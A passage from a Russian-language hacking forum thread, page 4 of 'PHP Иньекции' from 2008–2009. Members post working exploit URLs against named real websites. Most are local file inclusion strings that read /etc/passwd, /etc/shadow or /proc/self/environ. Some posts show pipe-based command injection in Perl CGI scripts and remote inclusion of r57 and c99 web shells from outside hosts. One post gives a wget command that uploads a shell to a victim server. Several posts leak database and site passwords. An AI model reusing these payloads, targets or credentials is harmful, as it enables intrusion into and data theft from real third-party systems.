PDA

Просмотр полной версии : PHP Иньекции


Страницы : 1 2 3 [4] 5

The matrix
02.08.2008, 22:39
http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
http://www.o3on.com/cgi-bin/use.pl?content=|id|

Я хз че за юзер но wget, curl и прочая дребедень... Там просто их нет. Ошибки при неправильном использовании wget не выдаются. Шелл на перл не залить. Однако файлы читаются отменно

Redyps
02.08.2008, 23:07
да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

mister
02.08.2008, 23:18
http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
вот так работает

Redyps
03.08.2008, 00:24
http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
шелл найдёте =)

..::TROYAN::..
03.08.2008, 16:35
вроде бы локальный инклуд
http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00

http://svpu-profi.lg.ua/page.php?page=[инклуд]

Ch3ck
04.08.2008, 16:16
да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

_http://www.o3on.com/cgi-bin/use.pl
Шелл. Пароль r57
Ойойёй... бл*ть... юзе.пл переписал... ну и *** с ним...

bul.666
07.08.2008, 11:37
Ищи проблему в самом шелле
http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
Иньекция рабоатет

aka PSIH
07.08.2008, 12:13
BanQui
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/z.txt?

aka PSIH
07.08.2008, 12:23
BanQui
шелл нормальный, это ты криворукий... ;)
+ там safe-mode ON
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/r.txt?

.Striker
08.08.2008, 01:17
http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd

..::TROYAN::..
08.08.2008, 12:59
http://hendaia.org/?url=../../../../../../../../../../etc/services
http://hendaia.org/?url=../../../../../../../../../../etc/passwd

$n@ke
08.08.2008, 14:25
по теме, антибоян не проверял:
http://cit.cs.dixie.edu/vt/vt4000/notes_from_text.php?filename=../../../../../../../../../../etc/passwd

оффтоп

Чо за бред мля??? Почему я не один файл не могу залить?


во первых ненадо в теме разводить галдеж,а вот вторых:
administrator:ogzsp5I.jyyQs
из конфига сервера..расшифровуй,мб что-то даст.

..::TROYAN::..
09.08.2008, 14:11
http://cafix.sourceforge.net/index.php?fichier=../../../../../../../../../etc/passwd

$n@ke
12.08.2008, 12:41
в болталку такие вопросы =\

по теме:
http://www.congress.gov.ph/legis/rules/index.php?rule=
похоже на инклуд, но чтото не получается..может сервачок поближе надо..хз.потрепайте.

S0ulVortex
12.08.2008, 16:46
http://www.planet-travel.ru/index.php?file=../../../../../../../../../../../etc/passwd

KPOT_f!nd
20.08.2008, 11:42
http://wrds.wharton.upenn.edu/cgi-bin/getfile.cgi?dataset=ibes&file=../../../../../../../../../../../../../../../etc/passwd

.Striker
27.08.2008, 17:05
http://www.syote.net/default_eng.php?file=../../../../../../../../../../../etc/passwd

.Striker
05.09.2008, 22:36
Сайт института какого то 8)
http://www.redbogota.com/inestudios/descargas/descarga.php?file=../../../../../../../../../../../etc/passwd

..::TROYAN::..
07.09.2008, 14:32
http://1shothost.com/kb/index.php?include_file=../../../../../../../../etc/passwd

.Striker
07.09.2008, 16:25
PR4
http://www.magg.com.tw/isupport/index.php?include_file=../../../../../../../../etc/passwd

..::TROYAN::..
10.09.2008, 17:53
http://www.ssga.ru/lidar/index.php?flag=10&file=../../../../../../../../etc/passwd

baltazar
10.09.2008, 18:05
http://hentan.eu/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.parcheggi.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.houseind.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.sacatering.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.biolegend.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.onlineauction.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.mindmovies.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://adamsandler.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://debeddy.net/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://ohioyd.org/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.totalpconline.com/phprocketaddin/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.emsc-csem.org/index.php?page=home&sub=gmap/index.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.tesis.de/de/index.php?page=../../../../../../../../../../../../../etc/passwd%00

cash$$$
21.09.2008, 03:04
http://www.ejls.eu/download.php?file=../../../../../../../../../../../etc/passwd

http://www.svadba-online.ru/links/?id=../../etc/passwd%00

http://www.svadba-online.ru/links/?id=../../etc/shadow%00

sabe
21.09.2008, 22:27
http://www.gjp1.cz/new/index.php?l=12&galeriesw=1&glr=dsdsds
magic_quotes_gpc = On

.Striker
22.09.2008, 19:20
http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
http://www.childrensgarden.ae/lib/download.php?file=../../../../../../../../../../../etc/passwd
http://www.kdsaccessories.com/it/index.php?file=../../../../../../../../../../../etc/passwd
http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
http://www.helpterminal.com/index.php?include_file=../../../../../../../../etc/passwd
http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd

.Striker
27.09.2008, 21:04
http://jvdominator.com/helpdesk/index.php?include_file=../../../../../../../../etc/passwd
http://rich.pk/team/index.php?include_file=../../../../../../../../etc/passwd
http://www.pprincipe.cult.cu/cubitas/index.php?pag=../../../../../../../../etc/passwd
http://www.cenda.cult.cu/php/loader.php?page=2&cont=../../../../../../../../etc/passwd
http://www.mmbauche.com/download.php?down=../../../../../../../../etc/passwd
http://www.newagehostingservice.info/iSupport/index.php?include_file=../../../../../../../../etc/passwd
http://www.ccbtools.com/support/index.php?include_file=../../../../../../../../etc/passwd

Cr@zy_King
03.10.2008, 06:08
ph-dep-th.web.cern.ch

http://ph-dep-th.web.cern.ch/ph-dep-th/?site=../../../../../etc/passwd

\

iddqd
26.10.2008, 14:09
http://christinaaguilera.com/getContent.php?f=../../../../../../../etc/passwd

_gr34t
28.10.2008, 07:40
Это вам не где-нибудь! :)
http://www.jedit.org/index.php?page=/etc/passwd%00

M@D_Z0mb1
08.11.2008, 15:46
americanairlines упс...
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../etc/passwd

-m0rgan-
14.11.2008, 18:03
Начал изучать пхп иньекты,вот что из этого вышол:
http://www.megaspace.com.br/espaco/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
--------------------------------------
http://www.cesarhoteis.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
http://www.redemultiloja.com.br/publico/php/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
http://mundomagico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------
http://www.cabildoccr.gov.py/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------
http://salveoplanetaterra.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------
http://www.gib-mbh.com/default/index2.php?pagina=../../../../etc/passwd%00
-----------------------------------
http://heshko.com/en/img.php?gal=../../../../../../../../etc/passwd%00
--------------------------------------
http://www.jibberjobber.com/static.php?page=../../../etc/passwd%00
------------------------------------------
http://home.no.net/vikebygd/index.php?vis=../../../../../../../etc/passwd%00
---------------------------------------------
http://www.pontewinery.com/php/index.php5?section=../../../../../../etc/passwd%00
--------------------------------------------
http://www.ays-clan.de/include.php?path=../../../../../../../../etc/passwd%00
-----------------------------------------------
http://www.thehype.de/kambodscha/forum/forum/YaBB.pl?board=../../../../../../../../etc/passwd%00
-------------------------------------------
http://www.eifn.ipacv.ro/index.php?action=../../../../../etc/passwd%00
-----------------------------------------------
http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00
---------------------------------------
The End!

-m0rgan-
17.11.2008, 04:28
http://www.wiscnews.com/archives/read.php?info=../../etc/passwd
---------------------------------
http://www.omega.ntnu.no/infosider/omomega.php?vis=../../../../../../etc/passwd%00
-------------------------------
http://www.ies.krakow.pl/konferencje/xxiii/index.php?link=../../../../../etc/passwd
------------------------------
http://forum.autonet.ca/cgi-bin/lookup.pl?user=../../../../../../etc/passwd%00
-------------------------------
http://www.tvmovie.de/dummy.123.0.html?&detail=../../../../../../../../../../../etc/passwd%00
--------------------------------
http://www.teddy.cx/index.php?site_id=../../../../etc/passwd%00
-------------------------------
http://www.thomasgray.org/cgi-bin/display.cgi?text=../../../../../etc/passwd%00
-------------------------------
http://www.yap.org.az/cgi-bin/datacgi/database.cgi?file=../../../../../../../../etc/passwd%00
-------------------------------
http://video.opalenica.com/index.php?sl=../../../../../../../etc/passwd%00
-------------------------------
The End!

spherics
18.11.2008, 14:57
Был такой или нет без понятия сори если что.....

http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/passwd%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/hosts%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/ftpusers%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/services%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/group%00

-m0rgan-
22.11.2008, 20:43
http://www.plaxis.nl/?cat=../../../../../../../../../etc/passwd%00
http://www.tda.as/en/index.php?id=/etc/passwd%00
http://www.bcs.hu/letoltes.php?d_id=../../../../../../etc/passwd
http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
http://www.gkflora.no/index.php?side=/etc/passwd%00
http://www.hermes.bz/autohouse/system/index.cgi?p_act=../../../../../../../../etc/passwd%00

satana8920
23.11.2008, 16:39
Вот от меня забираем и говорим спасибо =)

http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.rockfreak.de/index.php?page=[INCLUDE] - UNIX
http://skc-murman.ru/index.php?page=[INCLUDE]&catid=2 - UNIX, SAFE_MODE

Calcutta
24.11.2008, 08:15
http://singletreffen.de/index.php3?session=&id=../../../etc/passwd%00

+StArT+
30.11.2008, 05:00
www.profucom.com.mx
Profucom de México S.A de C.V. - Tecnología a Tu alcance
http://www.profucom.com.mx/profucom/atencion/help.php?css_path=../../../../../../etc/passwd%00

BanQui
01.12.2008, 03:45
http://www.rockfreak.de/index.php?page=http://pizdil.freehostia.com/r57shell.txt
http://www.izetit.de/index_projekte.php?page=http://pizdil.freehostia.com/shell - тут загвоска тут подставляет автоматом .htm

.Begemot.
02.12.2008, 19:55
У меня вот вопрос! Я нашел норм шелл но когда я какбы вставляю ссылку на него! То вылезает окно как у обычного шелла токо тама он читает, то что находится на моем сайте где он расположен сам!! Пример http://www.grammi.edu.gr/gr/index.php?page=http://pizdil.freehostia.com/gzr.php - тама он показывает то что находитсяя на моем сайте! А не то что находится на сайте www.grammi.edu.gr/ !!! Как это исправить??
www.grammi.edu.gr/gr/index.php?page=about.htm
www.grammi.edu.gr/gr/about.htm
www.grammi.edu.gr/gr/index.php?page=../images/aganargyroi_pic1.jpg

Neoveneficus
04.12.2008, 21:08
http://www.aquazoo.it/catalog/modules.php?op=modload&name=phpbb2&file=../../../../../../../../etc/passwd
только passwd - permission denied
можно что-нибудь по-вкуснее инклюдить

Tigger
05.12.2008, 00:03
http://www.volgogradtour.ru/script.php?s=../../../../../../../../../../../../../etc/passwd%00&c=24&m=60
http://sex-flirt.com/index.php3?id=../../../../../../../../../../../../../../../etc/passwd%00
http://singletreffen.de/index.php3?session=&id=../../../../../../../../../../../../../../../../../../../etc/passwd%00

+BemepoK+
07.12.2008, 15:04
Локальный инклуд

http://drocha.ru/?face=.htaccess


Так же можно смотреть стату сиджа

http://drocha.ru/webmasters.php


Реквизиты для входа:

pornoshkolacom::123
telkiname::121212
sweetyteenru::1234

0nep@t0p
07.12.2008, 20:11
www.singlespeed.org.uk
http://www.singlespeed.org.uk/article.php?file=../../../../../etc/passwd


www.videnet.gatech.edu
http://www.videnet.gatech.edu/cookbook.en/list_page.php?topic=6&url=../../../../../../etc/passwd&level=1&sequence=1&name=Best+Practices+for+the+Vid

baltazar
08.12.2008, 19:24
http://firstshot.org/index.php?content_file=../../../../../../etc/passwd

http://www.mrsmalls.com/NewPHP/home.php?section=../../../../../../etc/passwd%00

http://aeroregister.net//home.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.hackshit.com/?page=../../../../../etc/passwd%00

Tigger
10.12.2008, 02:13
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 - PHP - include
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/shadow%00 - узнаем пути
/www/www.cs.rmit.edu.au/special/fedconf/index.html =))
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd

ImpLex
16.12.2008, 02:37
Давненько активности небыло
http://www.triton.eu/default_en.php?url=../../../../../../../../etc/hosts

$n@ke
16.12.2008, 15:23
http://www.ifu.univ-paris8.fr/HTML/supports_cours/download.php?chemin=../../../../../../../boot.ini
win

$database = "__IFU";
$username = "Site";
$password = "noisy";

The matrix
17.12.2008, 02:08
Атака по перлам
Бажный perl скрипт на японском ресурсе.
http://tsukuba3.net/cgi-bin/albm.cgi?file=|id|
uid=1170(chicappa.jp-tsukuba3) gid=1000(ChicappaUser) groups=1000(ChicappaUser)
http://tsukuba3.net/cgi-bin/albm.cgi?file=|pwd|
/home/sites/chicappa.jp/users/chicappa.jp-tsukuba3/web/cgi-bin
http://tsukuba3.net/cgi-bin/albm.cgi?file=|which%20lynx|
/usr/bin/lynx
lyns присутствует(wget'a нету). Шелл заливается без проблем. Выкладывать не буду.
Кому надо сам зальет.


ещё нашел.
http://data.ccarnet.org/cgi-bin/respdisp.pl?file=../../../../../../../../../../../etc/passwd

The matrix
17.12.2008, 03:12
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|id|
uid=80(www) gid=80(www) groups=80(www)
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|pwd|
/var/www/cgi-adm
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|which%20fetch|
/usr/bin/fetch
походу только fetch есть. И через него отлично все заливается. Опять же не буду выкладывать шелл. Кто хочет, без всяких проблем сам зальет

Атака по перлам закончена

попугай
18.12.2008, 06:51
http://www.klassika.ru/read.html?proza/../

ыы

faza02
20.12.2008, 16:58
http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00

http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd

The matrix
27.12.2008, 19:52
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../../../etc/passwd

The matrix
28.12.2008, 02:34
1)
http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd

2)
http://jirisubrt.com/page.php?url=page.php
открываем сами себя и смотрим в сурцах.
<?$file=fopen ($url, "r");
FPassThru ($file);
?>
по сути стандартная читалка
3)
http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck
сохраняем потом открываем и любуемся

-=Razor=-
28.12.2008, 06:45
http://avatarcollectors.awardspace.com/index.php?id=../../../etc/passwd
вот)

sabe
14.01.2009, 09:50
http://www.skiensnett.com/index.php?page=../etc/passwd%00
http://faeetam.com.br/process.php?page=process.php%00&id=28&target=blockRight
http://gtpl-sida.org/index.php?page=formulaire_contact.php%00&idmenu=32&idsmenu=56

мне понравились инклуды) так что проверте и направте меня на правильный путь )
http://alazraq.com/parts/show.php?page=../index.php%00

http://www.dairyriver.com/index.php?page=../../index.php
http://www.solomilan.com/index.php?page=../indexphp%00

The matrix
24.01.2009, 01:49
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах

faza02
24.01.2009, 23:03
http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

$n@ke
25.01.2009, 01:27
www.chcns.us/display.php?folder=enrollment&file=../../../../../../../etc/passwd

случайно нашел, когда ковырял скули)) не крутил - так что грызите =)

sabe
26.01.2009, 03:51
Mil.ru
Министерство обороны Российской Федерации
http://www.mil.ru/info/1069/details/index.shtml?id=.%00
тссс))

попугай
27.01.2009, 06:06
http://www.jnvu.edu.in/getappointment.php?file='.base64_encode("../index.php")

параметр нужно в base64 перевести...

данные от мускуля

$host = "localhost";
$username ="root";
$databasename ="dtjnvudb";
$password = "DBManager";

The matrix
30.01.2009, 00:40
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах

Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl
http://fleaket.com/index.pl?page=index.pl
из содержания можно понять.

Его болезнь
if (open(PAGE, $page))
стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
http://fleaket.com/index.pl?page=/|id|]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)

http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget

Вроди как робит вгет, кому надо забирайте.

Еще из исходника понял, что продукт называется
PhoneBox

vikseriq
01.02.2009, 20:07
уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )

___
Спс скажи ++!

vikseriq
01.02.2009, 20:11
Хотя ладно, пользуйтесь на здоровье:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd

Twoster
02.02.2009, 09:24
Десяток. PR разношерстный.
http://protan.ru/page3.php?open=../../../../../etc/passwd
http://www.deweydoes.org/index.php?page=../../../../../../../etc/passwd
http://www.ulpan.net/index.php?menu=start&page=../../../../etc/passwd
http://www.scheduledairlinefailure.co.uk/index.php?page=../../../../etc/passwd
http://deserteuropean.com/content.html?page=../../../../../../etc/passwd
http://www.dumamanzi.co.za/index.php?page=../../../../etc/passwd OR etc/shadow(черный текст на черном фоне)
http://www.kerryjohnson.com/index12.php?page=../../../etc/passwd
https://www.asmic.co.jp/asmic.php?page=../../../../etc/passwd
http://amhet.com/?page=../../../../../../etc/passwd
http://www.ansicom.net/main.php?page=../images/pic1.jpg

$n@ke
02.02.2009, 15:55
Edu
http://disability.ucdavis.edu/news_retrieve.php?Article=../../../boot.ini
windows

Gorev
03.02.2009, 14:34
http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd

$n@ke
06.02.2009, 15:38
edu
есть пхпмайадмин))
http://duck.creighton.edu/index.php?target=../../../../../etc/passwd

http://elab.njit.edu/seio/index.php?page_link=../../../../../../../../etc/passwd&menu=6&page_name=Section+des+membres

Kraneg
06.02.2009, 17:56
http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd

http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=)

$n@ke
06.02.2009, 20:24
GAV-GAV =)
http://partcfitpvt.vermont.gov/parental_rights.php?show=../../../../../../../../../etc/passwd

Kraneg
08.02.2009, 18:14
gpec.ubc.ca PR5
http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
Админка:
http://www.gpec.ubc.ca/admin/
C basic авторизацией =)
Ну админка лысая =) ее можно посмотреть вот так:
http://www.gpec.ubc.ca/index.php?content=admin/index.php

iddqd
09.02.2009, 01:28
http://www.mirandasalon.kiev.ua/index.php?menu_lang=0&page=../../../../../../../etc/passwd&dop_menu=visible&menu_poz=1&tk=0&n_img=1

z00MAN
09.02.2009, 11:50
http://www.pdn.dkp.go.id/index.php?mod=../../../../../../../../../../../../etc/passwd

kevmen
09.02.2009, 14:41
http://www.dosuga.net/?type=anek&seq=doc&mk=on&num=
http://www.dosuga.net/anek/doc/titul.txt
http://www.dosuga.net/?type=anek&seq=xaker&mk=on&num=
http://www.dosuga.net/anek/xaker/titul.txt

http://www.dosuga.net/?type=../&seq=../%3C!--/*


P.S
sorry if something is wrong

BlackSun
11.02.2009, 21:04
PR7
http://www.phedigital.com/portal/es/load.php?file=some_file
Какой то суровый инсклуд =\ самого себя можно заинсклудить, /etc/passwd не хочет, сессии просто выдаются на экран, а не инсклудятся ..

z00MAN
11.02.2009, 23:12
удаленный инклуд :)

http://www.rocklandkaratedo.com/index.php?id=[url]

-m0rgan-
12.02.2009, 02:56
http://www.zorgbelang-flevoland.nl/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------------------------------
http://paulozambroza.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://www.domplan.pl/index.php?sl=../../../../../../../etc/passwd%00
----------------------------------------------------------
The End!

z00MAN
13.02.2009, 18:12
:)

http://www.guidoforster.ch/index.php?id=../../../../../../../../../../../../../../../etc/passwd%00

Kraneg
14.02.2009, 11:22
mutazu.com
http://www.mutazu.com/products.php?cat_id=7&product_id=101&s=../../../../../../../../etc/passwd

-m0rgan-
15.02.2009, 21:37
http://www.anastacionoticias.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
The End!

Twoster
17.02.2009, 09:49
38 штучек, PR разный, от 0 до 5-ти...

[PR 5] http://www.americanprimrosesociety.org/index.php?content=../../../../../etc/passwd&menu=societymenu.php
[PR 5] http://www.asianreviewofbooks.com/arb/textout.php3?filename=../../../../../../etc/passwd%00
[PR 5] http://www.avatiach.com/index.jsp?WORKING_CLASS=avatiach.ShowHtml&fileName=../../../../etc/passwd
[PR 4] http://gpu4vision.icg.tugraz.at/index.php?content=../../../../../etc/passwd
[PR 1] http://www.saamoa.ch/theartofbob/index.php?lang=en&content_main=../../../../etc/passwd
[PR 0] http://www.lilheartsandhands.com/index.php?contentm=../../../../etc/passwd
[PR 4, PR домена - 8] http://web.auth.gr/dent/web/el/depts/index.php?lab=endo&content=../../../../../etc/passwd
[PR 3] http://www.tvdn.eu/index.php?content=../../../../../../../etc/passwd
[PR 2] http://www.go4it-stafette.ch/index.php?content=http://www.evilc0der.com/c99.txt
[PR 0] http://www.indefinitez.com/index.php?page=../../../../etc/passwd
[PR 1] http://www.deganferah.ch/index.php?content=../../../etc/passwd
[PR 0] http://www.spksteuer.de/index.php?open=42&content=../../../../etc/passwd
[PR 4] http://www.curriculumrenewal.com/index.php?content=http://www.evilc0der.com/c99.txt
[PR 4] http://www.seawhale.com.tw/en/index.php?content=../../../../../etc/passwd
[PR 1] http://www.tip-automobile.ch/index.php?content=../../../etc/passwd
[PR 1] http://www.physio-jungeundrudolph.de/index.php?content=../../../../../../etc/passwd
[PR 0] http://www.ebfs.eu/de/?directory=News&page=../../../../../etc/passwd
[PR 4] http://www.paloaltophoto.com/auto_page.php?page=../../../../../etc/passwd (зрите в сорцы страницы)
[PR 3] http://www.hrchiro.com/index.cfm?page=../../../../../etc/shadow
[PR 0] http://www.dreamnet-comm.com/index.php?body=../../../etc/passwd
[PR 3] http://www.jakuzisattempt.com/read.php?filename=../../../etc/passwd
[PR 1] http://www.learn2spin.co.uk/admin/coastadmin.php?filename=../../../../../etc/passwd
[PR NA] http://www.smok-krakow.ovh.org/index.php?page=article.php&filename=../../../../../../etc/passwd
[PR 0] http://www.detaling.ru/page.php?filename=../../../../../../etc/passwd
[PR 0] http://www.rubinpartners.com.au/?page=../../../../../etc/passwd
[PR 1] http://www.gamillahphotography.com/index.php?page=../../../../etc/passwd
[PR 3] http://www.sebmedia.com/index.php?page=../../../../../etc/passwd
[PR 1] http://www.midirectory.com/cgi-bin/Dispatcher.php?ACTION=StaticPage.php&PAGE=../../../etc/passwd
[PR 1] http://www.indydesserts.com/?page=../../../../../../../../etc/passwd
[PR 3] https://www.talentxpress.com/html.php?page=../../../../etc/passwd
[PR 0] http://goalandsales.com/index.php?page=../../../../../etc/passwd
[PR 0] http://www.alohamortgage.com/?page=../../../etc/passwd
[PR 0] https://www.talentflare.com/html.php?page=../../../../etc/passwd
[PR 3] http://www.labortemps.com/pages/labor-temp.php?page=../../../../../../../../../etc/passwd
[PR 0] http://www.mercurimport.com/index.php?Page=../../../etc/passwd
[PR 0] http://www.agpe.com.au/index.php?page=../../../../etc/passwd
[PR 0] http://www.thebandicoots.com/index.php?page=../../../etc/passwd
[PR 1] http://www.puebloway.org/index.cfm?page=../../../../boot.ini (Win)

jokester, не ругайся, насяльника, на баяны пробил вроде! =)

[JavaScript]
18.02.2009, 16:26
Мой первый ПХП-инжекшн:
http://rfid-labs.dk/index.php?SubMenu=menu/submenu4.php&HeaderTextCode=4&ContentFile=/etc/passwd

Мой первый удаленный ПХП-инжекшн:
http://thetalentmentors.com/print.php?contentFile=RFI.

Kraneg
18.02.2009, 21:51
bagfix.com - PR1 =\
http://www.bagfix.com/index.php?fid=../../../../../../../../../etc/passwd

it's mу
19.02.2009, 06:45
вопрос про тему
а почему собственно в данную тему выкладывают только PHP-инклюдинг, когда тема называется PHP-инъекции?

Вообще-то PHP-инъекция это - выполнение постороннего PHP кода на серверной стороне:
http://www.ishmaelkhaldi.com/documents/blog.php?asd=blog.php&category_id=<?phpinfo()?>

[JavaScript]
19.02.2009, 18:10
http://www.hitronetic.com/nouveausite/index1.php?langue=en&filemenu=menu.php?filecontent=../../../../etc/passwd

Kraneg
19.02.2009, 19:56
thehilltimes.ca
http://www.thehilltimes.ca/members/login.php?fail=2&destination=/html/index.php?display=story&full_path=../../../../../../../../etc/passwd

joomler для вопросов есть отделная ветка =) а так это инклуд файлов и именно с этим ты ничего не сделаешь, как вариант ищи конфиги и так далее, где можно выудить пароли или еще что

Gorev
20.02.2009, 10:27
http://www.metro.ro/index.php?screen=SiteServicesQuality/content&page=../../../../../etc/passwd%00

InFlame
20.02.2009, 19:16
http://www.msu.ac.zw/info/news/m2006.showlist.php?file=../../../../../../../../../../../../etc/passwd

Kraneg
21.02.2009, 15:53
nexx.ca
http://www.nexx.ca/customer-care-faq.php?id=../../../../../etc/passwd

Neoveneficus
23.02.2009, 00:38
RFI ХАЧУ ПЛЮСЕГ! =)

http://www.birminghamsciencecity.com/about/people/working.php?incFile=RFI?
http://www.cahi.co.za/index.php?page=RFI
http://www.statuscapital.co.za/index.php?page=RFI?
http://tioline.ru/index.php?page=RFI?
http://www.eloduna.hu/index.php?page=RFI

$n@ke
24.02.2009, 22:59
http://www.utexas.edu/research/features/story.php?item=../../includes/config.php
Safe-mode


"SOAP_login" and "SOAP_pass" are the login credentials for the UT news Wordpress database */
$conf['SOAP_login'] = 'SOAPclient_research';
$conf['SOAP_pass'] = 'aw3edc';

August12
27.02.2009, 02:56
Greetz again here a little site in Netherlands

www.catchlight.nl/index.php?pagina=../../../../../../../../../../etc/passwd%00

S0ulVortex
07.03.2009, 14:48
http://www.atlllc.com/atlantis.php?page=/etc/passwd%00

http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

http://www.outlets.ca/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

InFlame
08.03.2009, 11:44
http://anapacenter.info/index.pl?id=../../../../../../../../../../etc/passwd%00

BlackSun
08.03.2009, 23:16
http://www.zambezigroceries.com/index.php?page=../../../../../../../../../proc/self/environ

M.W.N.N.
09.03.2009, 09:09
www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/etc/passwd

BlackSun
09.03.2009, 16:44
http://www.durangotelegraph.com/index.php?inc=/../../../../../../../../../../../../../../etc/passwd
http://www.ege.fcen.uba.ar/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.freulerchilbi.ch/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.mombergstube.de/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.q3s.de/portfolio/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.helpwithmath.com/index.php?include=../../../../../../../../../../../../../../etc/passwd

http://www.biodieselcambodia.com/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.christianalbrecht.de/au/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.dogwalker.com.br/blog/index.php?inc=../../../../../../../../../../../../../../proc/self/environ

Мешает open_basedir
http://pdcon.cz/elearning/obcan/index.php?inc=open_basedir
